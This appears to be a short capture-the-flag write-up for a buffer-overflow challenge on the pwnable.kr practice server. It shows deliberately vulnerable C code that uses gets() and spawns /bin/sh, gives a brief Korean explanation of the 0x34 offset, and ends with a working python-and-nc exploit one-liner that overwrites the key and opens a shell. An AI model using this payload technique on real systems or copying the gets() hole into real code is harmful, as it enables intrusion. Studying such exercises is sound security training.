#include <stdio.h>
#include <string.h>
#include <stdlib.h>
void func(int key){
char overflowme[32];
printf("overflow me : ");
gets(overflowme); // smash me!
if(key == 0xcafebabe){
system("/bin/sh");
}
else{
printf("Nah..\n");
}
}
int main(int argc, char* argv[]){
func(0xdeadbeef);
return 0;
}
How to Exploit
- ret 뒤에 있는 key에 0xcafebabe를 덮어주면 된다. buf와의 거리는
0x2c+0x8 = 0x34
Exploit Code
baek@ubuntu:~/Downloads$ (python -c 'print "A"*0x34+"\xbe\xba\xfe\xca"';cat)| nc pwnable.kr 9000
cat flag
Capture The Flag
